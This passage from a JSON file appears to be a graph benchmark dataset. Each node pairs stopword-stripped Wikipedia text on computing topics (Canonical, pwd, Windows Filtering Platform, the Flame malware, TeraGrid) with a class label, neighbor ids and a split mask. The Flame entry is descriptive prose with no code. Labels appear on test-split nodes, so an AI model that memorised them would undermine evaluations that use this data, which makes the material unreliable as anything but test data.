      10480,
      242,
      2804,
      3840,
      6927,
      8976,
      2322,
      9491,
      1812,
      5397,
      11030,
      5401,
      8473,
      11549,
      4384,
      5922,
      3876,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      1844,
      4407,
      315,
      321,
      1347,
      1348,
      4421,
      4423,
      6984,
      844,
      8524,
      8526,
      847,
      10068,
      9557,
      1366,
      10079,
      11616,
      2401,
      9569,
      8554,
      9579,
      5492,
      7546,
      2943,
      1408,
      1412,
      3462,
      8582,
      9609,
      9612,
      11149,
      11152,
      7057,
      5523,
      11667,
      3990,
      7064,
      9114,
      10654,
      8607,
      1952,
      8609,
      11683,
      9128,
      4010,
      8618,
      10155,
      10157,
      6584,
      2493,
      10173,
      6596,
      8644,
      4550,
      7629,
      984,
      1501,
      7134,
      479,
      2529,
      6114,
      8161,
      2027,
      5612,
      9196,
      4590,
      11245,
      11247,
      3571,
      10739,
      3573,
      9205,
      10229,
      2556,
      2045,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 5755,
    "label": 3,
    "text": "Canonical_(company):canonical company canonical ltd. uk-based privately held computer software company founded funded south african entrepreneur mark shuttleworth market commercial support related services ubuntu related projects canonical employs staff 30 countries maintains offices london austin boston shanghai beijing taipei isle man canonical ltd. created continues back several projects principally free open-source software foss tools designed improve collaboration free software developers contributors projects require contributor license agreement signed 2007 canonical launched international online shop selling support services ubuntu-branded goods later 2008 expanded united states-specific shop designed reduce shipment times time word ubuntu trademarked connection clothing accessories guardian interview may 2008 shuttleworth said canonical business model service provision canonical yet close profitability canonical stated would wait three five years become profitable shuttleworth regarded canonical positioning demand services related free software rose strategy compared red hat business strategies 1990s early-2009 new york times article shuttleworth said canonical revenue creeping towards company break-even point canonical achieved small operating profit 281,000 2009 however 2017 struggled maintain financial solvency took major financial hit development unity ubuntu touch leading operating loss 21.6 million fiscal year 2013 company reported operating profit 2 million 2017 shutting unity development team laying nearly 200 employees company plans focus server professional support solutions proved profitable shifting resources away ubuntu desktop cutting less profitable products services canonical plans maintain solvency achieve long-term profitability canonical 500 employees head office london 5th floor blue fin building southwark street previously moved 27th floor millbank tower summer 2006 canonical opened office montreal house global support services operation taipei 101 also home canonical office also oem team lexington massachusetts united states notable current employees canonical include notable past employees",
    "neighbors": [
      3969,
      2180,
      10255,
      5523,
      11669,
      3478,
      10393,
      4890,
      8476,
      926,
      5410,
      3245,
      6445,
      7087,
      8112,
      439,
      823,
      10687,
      196,
      3654,
      5962,
      11082,
      11338,
      975,
      6352,
      1107,
      4951,
      8794,
      11263,
      3550,
      863,
      4192,
      865,
      5343,
      6625,
      7140,
      5990,
      3815,
      7913,
      362,
      8554,
      7020,
      9324,
      9455,
      9839,
      8177,
      2930,
      9971,
      1396,
      3189,
      5369,
      5755,
      6397,
      3582,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 5756,
    "label": 3,
    "text": "Compaq_Deskpro:compaq deskpro compaq deskpro line business-oriented personal computers manufactured compaq discontinued merger hewlett-packard models produced containing microprocessors 8086 x86-based intel pentium 4 original compaq deskpro released 1984 available several disk configurations xt-class pc equipped 8 mhz 8086 cpu compaq unique display hardware combined color graphics adapter graphics high resolution monochrome display adapter text result considerably faster ibm pc much better quality text display compared ibm pc equipped graphics like earlier compaq portable hardware bios 100 compatible ibm pc model 5150 characteristic pc workalikes shared soon establishment ibm standard 1985 compaq released deskpro 286 looks quite similar ibm pc/at 1987 deskpro 386 launched intel released 80386 microprocessor beating ibm 7 months comparable 386 computer thus making name deskpro 386/25 released august 28 1989 cost 7,999 form factor compaq deskpro mostly desktop model lies upon desk monitor placed top compaq produced many tower upright models highly successful sales usually convertible desktop form factor sff small form factor desktop version also produced deskpro lifetime many different models include",
    "neighbors": [
      11008,
      5384,
      3214,
      8212,
      1304,
      8229,
      563,
      5571,
      10692,
      7243,
      3281,
      1874,
      2258,
      11100,
      1638,
      1515,
      6765,
      8301,
      11505,
      499,
      3445,
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 5757,
    "label": 4,
    "text": "George_Ledin:george ledin dr. george ledin jr. born january 28 1946 controversial professor computer science department sonoma state university one courses titled computer security malware ledin teaches malware techniques well defenses ledin strong critic antivirus software industry whose products considers almost useless",
    "neighbors": [
      7515,
      2213
    ],
    "mask": "None"
  },
  {
    "node_id": 5758,
    "label": 2,
    "text": "Brick_Breaker:brick breaker brick breaker videogame came preloaded blackberry available app store ios brick breaker platformer breakout clone player must smash wall bricks deflecting bouncing ball paddle paddle may move horizontally controlled blackberry trackwheel computer mouse touch finger case touchscreen player gets 3 lives start life lost ball hits bottom screen bricks destroyed player advances new harder level 34 levels many levels unbreakable silver bricks lives lost game many versions brick breaker shoot flaming fireballs play one ball player gets power brick breaker cult following professional players trying achieve high scores game addictiveness highlighted vancouver sun dozens forums support groups yes brick breaker addiction facebook page spouses complaining addicted mates",
    "neighbors": [
      2208,
      9063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5759,
    "label": 6,
    "text": "Pwd:pwd unix-like operating systems codice_1 command print working directory writes full pathname current working directory standard output command shell builtin unix shells bourne shell ash bash ksh zsh implemented easily posix c functions codice_2 codice_3 also available operating systems spartados x panos kolibrios equivalent dos codice_4 microsoft windows codice_5 codice_6 command arguments windows powershell provides equivalent codice_7 cmdlet standard aliases codice_8 codice_1 openvms equivalent codice_10 version codice_1 bundled gnu coreutils written jim meyering numerical computing environments matlab gnu octave include codice_1 function similar functionality note posix requires default behavior -l switch provided posix shells set following environment variables using cd command",
    "neighbors": [
      2050,
      515,
      516,
      9733,
      9735,
      6664,
      521,
      532,
      7196,
      3618,
      2599,
      8236,
      8260,
      10822,
      5703,
      5706,
      3659,
      3674,
      6238,
      8304,
      4721,
      8306,
      2180,
      5256,
      6281,
      6797,
      4750,
      2198,
      6812,
      7326,
      7847,
      11442,
      7356,
      2245,
      5833,
      1741,
      10967,
      9946,
      10464,
      6369,
      4850,
      8436,
      10484,
      8954,
      1790,
      3856,
      4369,
      5397,
      802,
      4398,
      7983,
      1336,
      8504,
      8517,
      9542,
      8522,
      10068,
      9579,
      1902,
      1394,
      5492,
      11654,
      3976,
      4493,
      11663,
      1939,
      4001,
      5555,
      9148,
      10687,
      451,
      1987,
      965,
      8147,
      2010,
      8675,
      10727,
      6120,
      491,
      11249,
      5106,
      3571,
      8692,
      506,
      9204,
      6138,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 5760,
    "label": 9,
    "text": "MIRC_scripting_language:mirc scripting language mirc scripting language often unofficially abbreviated msl scripting language embedded mirc irc client windows scripts stored either plain text files usually .mrc file extension ini files however stored extension multiple script files loaded one time although cases one script conflict another cause one longer work properly mirc scripting involves peculiar nomenclature entirely consistent rest programming world notably term identifier—which languages refers name variable function whether returns value —in mirc refers specifically value returning function intended singular access file time issue codice_7 codice_6 open close file access multiple accesses loop instance best handled codice_9 codice_10 codice_11 since opens file cases codice_12 codice_13 even efficient non scripted loop method code remote scripts format placed alias file command names preceded word codice_32 test comments include common codice_33 codice_34 example hello world alias remote script automatically respond certain text",
    "neighbors": [
      9345,
      5251,
      6797,
      6160,
      5397,
      7983,
      9775,
      9780,
      7861,
      6335,
      5316,
      5199,
      2387,
      3030,
      7384,
      2409,
      11625,
      5612,
      2804,
      1016
    ],
    "mask": "Test"
  },
  {
    "node_id": 5761,
    "label": 2,
    "text": "Windows_Filtering_Platform:windows filtering platform microsoft computer-systems windows filtering platform wfp comprises set system services application programming interface first introduced windows vista 2006/2007 allows applications tie packet processing filtering pipeline next generation tcp/ip network stack provides features integrated communication administrators configure invoke processing logic per-application basis microsoft intended wfp use firewalls packet-processing connection-monitoring components antivirus antimalware software parental controls additionally wfp used implement nat store ipsec policy configuration filtering platform includes following components since windows 8 windows server 2012 wfp allows filtering second layer tcp/ip windows 7 functionality added netsh command allows rich diagnostics internal state wfp functionality useful debug root-cause issues packet drops ms kb 979223 documents serious memory leak affecting vista windows 7 issues deployments wfp include ms hotfix rollup 981889 windows 7 sp1 vista sp3 comes newer require fixes note problems persist regarding use multiple network buffer lists",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      5225,
      1656,
      5754,
      9340,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      2213,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5402,
      5913,
      11546,
      4384,
      2854,
      8998,
      10024,
      11559,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8654,
      8161,
      6114,
      2027,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 5762,
    "label": 3,
    "text": "ASCII_Corporation:ascii corporation ascii founded 1977 kazuhiko nishi keiichiro tsukamoto originally publisher magazine name ascii talks bill gates nishi led creation microsoft first overseas sales office ascii microsoft 1979 nishi also known role marketing msx 1983 8-bit standard computer well known former ussr japan 1984 ascii engaged semiconductor business followed expansion commercial online service 1985 brand ascii-net popularity home video game systems soared 1980s ascii became active development publishing software peripherals popular consoles family computer mega drive microsoft public stock offering 1986 ascii microsoft dissolved around time company also obliged reform result aggressive diversification first half 1980s company went public 1989 ascii revenue fiscal year ending march 1996 56 billion yen broken sectors publication 52.5 27.0 billion yen game entertainment 27.8 14.3 billion yen systems semiconductors 10.8 6 billion yen others despite struggles remain focused core businesses company continued suffer accumulated debts arrangement set csk corporation execute major investment ascii 1997 mid-90s ascii acquired company something good renamed ascii something good developed 3 sega saturn games ai shougi 1995 ai igo 1997 ai shougi 2 1998 ascii become popular software market branched created american satellite 1991 known ascii entertainment focus supporting interactive entertainment channel america startup company agetec ascii game entertainment technology spun independent corporation 1998 later became fully independent publisher one year later co-founder tsukamoto left ascii create company 1992 named impress november 26 2001 csk corporation unison capital partners l.p. announced approval transferring control subsidiary ascii unison capital partners l.p. effective 2002-03-30 part strategy focus csk group operations b2b businesses transfer approved december 21 2001 part deal ascii outstanding debt owed csk forgiven unison control ascii enterbrain publishing divisions would maintain autonomy ascii restructured concentrate pc publishing businesses may 28 2002 unison media partners announced ascii would become fully owned subsidiary via share exchange ascii would delisted effective october 1 2002 november 18 2002 astroarts subsidiary renamed ascii ascii renamed medialeaves former astroarts subsidiary would inherit publishing business former ascii january 29 2004 unison capital partners l.p. announced sale ascii parent company medialeaves kadokawa group holdings completed 2004-03 september 27 2007 kadokawa group holdings announced merger subsidiaries mediaworks ascii name ascii media works effective april 1 2008 merger approved 2008 january 10 2010 formerly named ascii company medialeaves merged enterbrain dissolving last ascii entity",
    "neighbors": [
      2055,
      11557,
      8620,
      9006,
      2096,
      178,
      8371,
      10931,
      5436,
      9161,
      4682,
      6096,
      6867,
      5333,
      6109,
      4317,
      606,
      9951,
      481,
      7651,
      2156,
      7166
    ],
    "mask": "Test"
  },
  {
    "node_id": 5763,
    "label": 8,
    "text": "Archi_(tool):archi tool archi free open-source visual-modelling design tool creating archimate models modelling sketches archi initially funded 2010 2012 jisc part national project aimed supporting programme enterprise architecture uk higher education sector original project hosted institute educational cybernetics bolton university uk since january 2013 archi continued maintained volunteer basis creator phil beauvoir jean-baptiste sarrodie archi supports archimate 3.0 modelling language technical standard open group archi provides open source reference implementation archimate currently used one tools implement open group archimate model exchange file format plugins available github",
    "neighbors": [
      8975
    ],
    "mask": "Test"
  },
  {
    "node_id": 5764,
    "label": 4,
    "text": "Flame_(malware):flame malware flame also known flamer skywiper skywiper modular computer malware discovered 2012 attacks computers running microsoft windows operating system program used targeted cyber espionage middle eastern countries discovery announced 28 may 2012 maher center iranian national computer emergency response team cert kaspersky lab crysys lab budapest university technology economics last stated report flame certainly sophisticated malware encountered practice arguably complex malware ever found flame spread systems local network lan record audio screenshots keyboard activity network traffic program also records skype conversations turn infected computers bluetooth beacons attempt download contact information nearby bluetooth-enabled devices data along locally stored documents sent one several command control servers scattered around world program awaits instructions servers according estimates kaspersky may 2012 flame initially infected approximately 1,000 machines victims including governmental organizations educational institutions private individuals time 65 infections happened iran israel palestine sudan syria lebanon saudi arabia egypt huge majority targets within iran flame also reported europe north america flame supports kill command wipes traces malware computer initial infections flame stopped operating public exposure kill command sent flame linked equation group kaspersky lab however costin raiu director kaspersky lab global research analysis team believes group cooperates creators flame stuxnet position superiority equation group definitely masters giving others maybe bread crumbs time time giving goodies integrate stuxnet flame flame a.k.a da flame identified may 2012 maher center iranian national cert kaspersky lab crysys lab laboratory cryptography system security budapest university technology economics kaspersky lab asked united nations international telecommunication union investigate reports virus affecting iranian oil ministry computers kaspersky lab investigated discovered md5 hash filename appeared customer machines middle eastern nations discovering pieces researchers dubbed program flame one main modules inside toolkit nowiki /nowiki frog.defaultattacks.a-installflame nowiki /nowiki according kaspersky flame operating wild since least february 2010 crysys lab reported file name main component observed early december 2007 however creation date could determined directly creation dates malware modules falsely set dates early 1994 computer experts consider cause attack april 2012 caused iranian officials disconnect oil terminals internet time iranian students news agency referred malware caused attack wiper name given malware creator however kaspersky lab believes flame may separate infection entirely wiper malware due size complexity program—described twenty times complicated stuxnet—the lab stated full analysis could require long ten years 28 may iran cert announced developed detection program removal tool flame distributing select organizations several weeks flame exposure news media symantec reported 8 june flame command control c c computers sent suicide command infected pcs remove traces flame according estimates kaspersky may 2012 initially flame infected approximately 1,000 machines victims including governmental organizations educational institutions private individuals time countries affected iran israel palestinian territories sudan syria lebanon saudi arabia egypt flame uncharacteristically large program malware 20 megabytes written partly lua scripting language compiled c++ code linked allows attack modules loaded initial infection malware uses five different encryption methods sqlite database store structured information method used inject code various processes stealthy malware modules appear listing modules loaded process malware memory pages protected read write execute permissions make inaccessible user-mode applications internal code similarities malware exploits two security vulnerabilities used previously stuxnet infect systems malware determines antivirus software installed customises behaviour example changing filename extensions uses reduce probability detection software additional indicators compromise include mutex registry activity installation fake audio driver malware uses maintain persistence compromised system flame designed deactivate automatically supports kill function makes eliminate traces files operation system receipt module controllers flame signed fraudulent certificate purportedly microsoft enforced licensing intermediate pca certificate authority malware authors identified microsoft terminal server licensing service certificate inadvertently enabled code signing still used weak md5 hashing algorithm produced counterfeit copy certificate used sign components malware make appear originated microsoft successful collision attack certificate previously demonstrated 2008 flame implemented new variation chosen-prefix collision attack like previously known cyber weapons stuxnet duqu employed targeted manner evade current security software rootkit functionality system infected flame spread systems local network via usb stick record audio screenshots keyboard activity network traffic program also records skype conversations turn infected computers bluetooth beacons attempt download contact information nearby bluetooth enabled devices data along locally stored documents sent one several command control servers scattered around world program awaits instructions servers unlike stuxnet designed sabotage industrial process flame appears written purely espionage appear target particular industry rather complete attack toolkit designed general cyber-espionage purposes using technique known sinkholing kaspersky demonstrated huge majority targets within iran attackers particularly seeking autocad drawings pdfs text files computing experts said program appeared gathering technical diagrams intelligence purposes network 80 servers across asia europe north america used access infected machines remotely 19 june 2012 washington post published article claiming flame jointly developed u.s. national security agency cia israel ’ military least five years prior project said part classified effort code-named olympic games intended collect intelligence preparation cyber-sabotage campaign aimed slowing iranian nuclear efforts according kaspersky chief malware expert geography targets also complexity threat leaves doubt nation-state sponsored research went kaspersky initially said malware bears resemblance stuxnet although may parallel project commissioned attackers analysing code kaspersky later said strong relationship flame stuxnet early version stuxnet contained code propagate via usb drives nearly identical flame module exploits zero-day vulnerability iran cert described malware encryption special pattern see coming israel daily telegraph reported due flame apparent targets—which included iran syria west bank—israel became many commentators prime suspect commentators named china u.s. possible perpetrators richard silverstein commentator critical israeli policies claimed confirmed senior israeli source malware created israeli computer experts jerusalem post wrote israel vice prime minister moshe ya'alon appeared hinted government responsible israeli spokesperson later denied implied unnamed israeli security officials suggested infected machines found israel may imply virus could traced u.s. western nations u.s. officially denied responsibility leaked nsa document mentions dealing iran discovery flame nsa gchq jointly-worked event",
    "neighbors": [
      1024,
      3072,
      5636,
      517,
      10245,
      10756,
      9744,
      9233,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      9256,
      3643,
      7739,
      9791,
      1088,
      4165,
      1608,
      3657,
      8779,
      4186,
      4703,
      8288,
      8292,
      107,
      10875,
      5245,
      3711,
      8320,
      7809,
      6786,
      9346,
      2187,
      9356,
      6797,
      4240,
      150,
      1688,
      3225,
      1690,
      10392,
      2717,
      9375,
      161,
      5281,
      2213,
      4777,
      9904,
      9395,
      8886,
      3789,
      7887,
      4304,
      6360,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      4344,
      3320,
      7418,
      4863,
      2815,
      1279,
      3843,
      10502,
      8978,
      4883,
      10003,
      278,
      3867,
      8998,
      297,
      2857,
      6954,
      8489,
      11052,
      9518,
      1337,
      11584,
      3395,
      4945,
      6484,
      857,
      1882,
      7515,
      3423,
      9569,
      5986,
      3941,
      2409,
      877,
      3956,
      9082,
      7044,
      2959,
      11152,
      10132,
      10141,
      1440,
      5024,
      5028,
      11175,
      9129,
      5546,
      939,
      5547,
      7601,
      1970,
      8627,
      441,
      1979,
      4027,
      5563,
      6588,
      9664,
      8133,
      2508,
      4054,
      7639,
      8664,
      9688,
      1504,
      8674,
      9186,
      2542,
      2041,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 5765,
    "label": 2,
    "text": "MSXML:msxml microsoft xml core services msxml legacy set services allowed applications written jscript vbscript microsoft development tools build windows-native xml-based applications supports xml 1.0 dom sax xslt 1.0 processor xml schema support including xsd xdr well xml-related technologies msxml products similar exposed programmatically ole automation subset com components developers program msxml components c c++ active scripting languages jscript vbscript managed .net interop msxml com components supported recommended com components msxml object programmatically instantiated clsid progid version msxml exposes set clsid progids example create msxml 6.0 domdocument object exposes codice_1 codice_2 codice_3 com interfaces progid msxml2.domdocument.6.0 must used msxml also supports version-independent progids version-independent progids version number associated example microsoft.xmlhttp progids first introduced msxml 1.0 however currently mapped msxml 3.0 objects msxml3.dll different versions msxml support slightly different sets functionality example msxml 3.0 supports xdr schemas support xsd schemas msxml 4.0 msxml 5.0 msxml 6.0 support xsd schemas however msxml 6.0 support xdr schemas support xml digital signatures provided msxml 5.0 new xml-related software development microsoft recommends using msxml 6.0 lightweight cousin xmllite native code-only projects msxml collection distinct products released supported microsoft product versions enumerated follows information version also available microsoft downloads website",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      6171,
      1055,
      7713,
      2083,
      8227,
      1577,
      10282,
      4143,
      9263,
      11316,
      1077,
      8246,
      10808,
      4174,
      9808,
      4178,
      9813,
      8281,
      603,
      2145,
      9328,
      1656,
      5754,
      9340,
      5761,
      3715,
      9348,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      2777,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      1802,
      6927,
      9491,
      790,
      11030,
      5401,
      5913,
      8473,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      11060,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      6028,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      9167,
      11223,
      479,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      502,
      10229,
      2045,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 5766,
    "label": 4,
    "text": "Spider.io:spider.io spider.io company london specializes detection malware botnets generate web traffic used online advertising fraud company founded 2010 founder douglas de jager software used company includes storm shelf open source software handle large amounts data using solutions like hadoop later also mahout spider.io start writing software online advertising fraud detection later point choice shelf open source software looked sensible 2012 spider.io pointed vulnerability internet explorer mouse cursor position pc victim could tracked attacker claimed vulnerability exploited large scale example botnet detected analyzed spider.io 2013 chameleon botnet spider.io also raises awareness general easy generate fake web traffic sharing information techniques used 2014 spider.io acquired google inc.. time company seven employees google inc. important advertising fraud eliminated internet one reasons much income company comes online advertisements besides acquisition spider.io also employs many people combat fraud ways",
    "neighbors": [
      4584
    ],
    "mask": "Test"
  },
  {
    "node_id": 5767,
    "label": 7,
    "text": "TeraGrid:teragrid teragrid e-science grid computing infrastructure combining resources eleven partner sites project started 2001 operated 2004 2011 teragrid integrated high-performance computers data resources tools experimental facilities resources included petaflops computing capability 30 petabytes online archival data storage rapid access retrieval high-performance computer network connections researchers could also access 100 discipline-specific databases teragrid coordinated grid infrastructure group gig university chicago working partnership resource provider sites united states us national science foundation nsf issued solicitation asking distributed terascale facility program director richard l. hilderbrandt teragrid project launched august 2001 53 million funding four sites national center supercomputing applications ncsa university illinois urbana-champaign san diego supercomputer center sdsc university california san diego university chicago argonne national laboratory center advanced computing research cacr california institute technology pasadena california design meant extensible distributed open system start october 2002 pittsburgh supercomputing center psc carnegie mellon university university pittsburgh joined teragrid major new partners nsf announced 35 million supplementary funding teragrid network transformed etf project 4-site mesh dual-hub backbone network connection points los angeles starlight facilities chicago october 2003 nsf awarded 10 million add four sites teragrid well establish third network hub atlanta new sites oak ridge national laboratory ornl purdue university indiana university texas advanced computing center tacc university texas austin teragrid construction also made possible corporate partnerships sun microsystems ibm intel corporation qwest communications juniper networks myricom hewlett-packard company oracle corporation teragrid construction completed october 2004 time teragrid facility began full production august 2005 nsf newly created office cyberinfrastructure extended support another five years 150 million set awards included 48 million coordination user support grid infrastructure group university chicago led charlie catlett using high-performance network connections teragrid featured high-performance computers data resources tools high-end experimental facilities around usa work supported project sometimes called e-science 2006 university michigan school information began study teragrid may 2007 teragrid integrated resources included 250 teraflops computing capability 30 petabytes quadrillions bytes online archival data storage rapid access retrieval high-performance networks researchers could access 100 discipline-specific databases late 2009 teragrid resources grown 2 petaflops computing capability 60 petabytes storage mid 2009 nsf extended operation teragrid 2011 follow-on project approved may 2011 july 2011 partnership 17 institutions announced extreme science engineering discovery environment xsede nsf announced funding xsede project five years 121 million xsede led john towns university illinois national center supercomputing applications teragrid resources integrated service-oriented architecture resource provides service defined terms interface operation computational resources run set software packages called coordinated teragrid software services ctss ctss provides familiar user environment teragrid systems allowing scientists easily port code one system another ctss also provides integrative functions single-signon remote job submission workflow support data movement tools etc ctss includes globus toolkit condor distributed accounting account management software verification validation software set compilers programming tools environment variables teragrid uses 10 gigabits per second dedicated fiber-optical backbone network hubs chicago denver los angeles resource provider sites connect backbone node 10 gigabits per second users accessed facility national research networks internet2 abilene backbone national lambdarail teragrid users primarily came u.s. universities roughly 4,000 users 200 universities academic researchers united states obtain exploratory development allocations roughly cpu hours based abstract describing work done extensive allocations involve proposal reviewed quarterly peer-review process allocation proposals handled teragrid website proposers select scientific discipline closely describes work enables reporting allocation use teragrid scientific discipline july 2006 scientific profile teragrid allocations usage discipline categories correspond specific program area national science foundation starting 2006 teragrid provided application-specific services science gateway partners serve generally via web portal discipline-specific scientific education communities science gateways program teragrid aims broaden access least order magnitude terms number scientists students educators able use teragrid",
    "neighbors": [
      9665,
      5956,
      10021,
      7847,
      5384,
      4107,
      3323,
      10641,
      11353,
      1115,
      1823
    ],
    "mask": "None"
  },
  {
    "node_id": 5768,
    "label": 8,
    "text": "Enterprise_Architect_(software):enterprise architect software sparx systems enterprise architect visual modeling design tool based omg uml platform supports design construction software systems modeling business processes modeling industry based domains used businesses organizations model architecture systems process implementation models across full application development life-cycle systems modeling using uml provides basis modeling aspects organizational architecture along ability provide foundation designing implementing new systems changing existing systems aspects covered type modeling range laying organizational systems architectures business process reengineering business analysis service-oriented architectures web modeling application database design re-engineering development embedded systems along system modeling enterprise architect covers core aspects application development life-cycle requirements management design construction testing maintenance phases support traceability project management change control processes well facilities model driven development application code using internal integrated-development platform user base ranges programmers business analysts enterprise architects organizations ranging small developer companies multi-national corporations government organizations international industry standards bodies sparx systems initially released enterprise architect 2000 originally designed uml modeling tool modeling uml 1.1 product evolved include omg uml specifications 1.3 2.0 2.1 2.3 2.4.1 2.5 enterprise architect supports range open industry standards designing modeling software business systems uml 2.5 sysml 1.5 bpmn 2.0 dmn bpel soaml spem wsdl xsd dds archimate 3.0 arcgis ifml cmmn geography markup language gml odm owl rdf enterprise integration patterns eip enterprise architect also supports industry frameworks zachman framework togaf including feaf uaf updm framework supports dodaf modaf naf service-oriented modeling framework somf supportd frameworks supplied industry bodies trak geosciml niem supports core service-oriented architectures soaml service-oriented modeling framework somf enterprise-level architecture along round trip engineering wsdl xsd used facilitate bpel generation models published industry standards development bodies using enterprise architect include underlying uml modeling key aspects modeling tools support core aspects supported enterprise architect include profiles patterns mof ocl mda transforms corba idl uml validation run model common features requirements management supported enterprise architect include customization requirements documented linking requirements design implementation details providing requirement traceability design construction phases requirements subject change management workflow processing baseline comparison auditing enterprise architect supports number methods modeling business processes using uml foundation modeling language core languages business modeling analysis include bpmn bpel along various historic profiles enterprise architect also supports definition business rules ability generate executable code rules business modeling combined gap analysis view potential gaps proposed solutions model simulation supported behavioral diagrams state machines interaction sequence diagrams activities execution flow defined using triggers guards effects simulation supports re-runs alteration triggered events supports viewing variables call stack setting debug markers also support interaction emulated user-interface screens containing common ui fields bpmn diagrams using bpsim bpmn models simulated creating tabulated results analysis. monte carlo probability based simulations sysml parametric simulation using open modelica mathematical formulas sysml blocks parametric blocks simulated plotting graphs used analysis dmn simulation simulation supports interaction dmn models bpmn models using bpsim line model driven design principles enterprise architect supports mda transforms pim class structures psm class structures round-trip engineering code 10 software languages several key embedded hdl systems languages ada vhdl verilog also supports code generation behavioral models languages supported include actionscript c c c++ delphi java including java 1.5 aspects generics php python july 2019 enterprise architect capability reverse engineer object oriented python code parse _init_ method visual basic visual basic .net accordance model driven development principles enterprise architect provides integrated development environment supports code editing syntax highlighting intellisense building debugging code testing within model compilers interpreters supported microsoft windows native c c++ visual basic.net family c j vb sun microsystems java php gnu compilers c++ c ada gcc gdb .add-ins available integration ms visual studio eclipse wireframe modeling supports using templates modeling appearance dialogs presented users interacting application supported device dialogs include screen dialogs webpages android apple windows 8.1 phones tablets code based testing support xunit testing involves mda transformation classes nunit junit classes ability generate unit tests model automatically record results tested classes testpoint testing model based code testing parallel test contracts defined ‘ design contract ’ runs using debug definitions methods support test definitions test results logged related classes model integrated building debugging code enterprise architect allows developer perform abstract analysis software using profiling sequence diagram generation sequence diagram generation provides means analyze general process flow iron inconsistencies profiling summarizes thread routine code general efficiency system engineering supported sysml 1.4 modeling coupled executable code generation sysml supports modeling requirement definition system composition using sysml blocks parts parametric model simulation executable code generation supports embedded hdl system languages ada vhdl verilog coupled behavioral code generation standard code languages defined enterprise architect supports data modeling conceptual physical levels forward reverse engineering database schemas mda transformation logical platform independent physical dbms platform dependant diagram types supported include ddl notation erd notation idef1x notation information engineering notation supported dbmss include db2 firebird/interbase ms access 97 2000 2003 2007 2013 ms sql server editions 2005 including express azure mysql mariadb sqlite oracle 9i editions postgresql arcgis informix ingres sybase adaptive server anywhere sybase asa sybase adaptive server enterprise sybase ase features supporting project management include resource allocation tracking using gantt charts kanban diagrams event logging using model calendars workflow scripting setting workflow processes security model metrics key facilities supporting change management auditing baseline difference merge version control version control interface supports major version control applications subversion cvs team foundation server scc interface scc compatible version control system features support integration tools include xmi import/export supports xmi 1.1 1.2 2.1 specifications import .emx rhapsody files open services lifecycle collaboration oslc csv import/export archimate open exchange format import export version 13 automation interface – supports comprehensive api use com based language java among add-ins available interfaces vs .net eclipse microsoft office doors along third party add-ins interfacing likes jira",
    "neighbors": [
      1668,
      4107,
      11030,
      5283,
      5546,
      428,
      5677,
      9389,
      7983,
      3762,
      4919,
      823,
      6850,
      8644,
      2501,
      847,
      3159,
      8539,
      1632,
      10340,
      8554,
      8683,
      7022,
      10097,
      11125,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5769,
    "label": 4,
    "text": "Bvckup_2:bvckup 2 bvckup 2 unidirectional file synchronization app windows nt family developed swiss-based pipemetrics sa replicates files one location another original format uses delta copying speed operation program supports scheduling removable device tracking using shadow copy service transfer open locked files move renaming detection security attribute cloning email alerts however support compression encryption",
    "neighbors": [
      5380,
      1801,
      5356,
      3629,
      1358,
      7983,
      8976
    ],
    "mask": "Test"
  },
  {
    "node_id": 5770,
    "label": 7,
    "text": "Cloud_management:cloud management cloud management management cloud computing products services public clouds managed public cloud service providers include public cloud environment ’ servers storage networking data center operations users may also opt manage public cloud services third-party cloud management tool users public cloud services generally select three basic cloud provisioning categories managing private cloud requires software tools help create virtualized pool compute resources provide self-service portal end users handle security resource allocation tracking billing management tools private clouds tend service driven opposed resource driven cloud environments typically highly virtualized organized terms portable workloads hybrid cloud environments compute network storage resources must managed across multiple domains good management strategy start defining needs managed policies help govern domains include configuration installation images access control budgeting reporting access control often includes use single sign-on sso user logs gains access systems without prompted log cloud management combines software technologies design managing cloud environments software developers responded management challenges cloud computing variety cloud management platforms tools tools include native tools offered public cloud providers well third-party tools designed provide consistent functionality across multiple cloud providers administrators must balance competing requirements efficient consistency across different cloud platforms access different native functionality within individual cloud platforms growing acceptance public cloud increased multicloud usage driving need consistent cross-platform management rapid adoption cloud services introducing new set management challenges technical professionals responsible managing systems services cloud-management platforms tools ability provide minimum functionality following categories functionality natively provided orchestrated via third-party integration organizations may group criteria key use cases including cloud brokerage devops automation governance day-2 life cycle operations enterprises large-scale cloud implementations may require robust cloud management tools include specific characteristics ability manage multiple platforms single point reference intelligent analytics automate processes like application lifecycle management high-end cloud management tools also ability handle system failures automatically capabilities self-monitoring explicit notification mechanism include failover self-healing capabilities legacy management infrastructures based concept dedicated system relationships architecture constructs well suited cloud environments instances continually launched decommissioned instead dynamic nature cloud computing requires monitoring management tools adaptable extensible 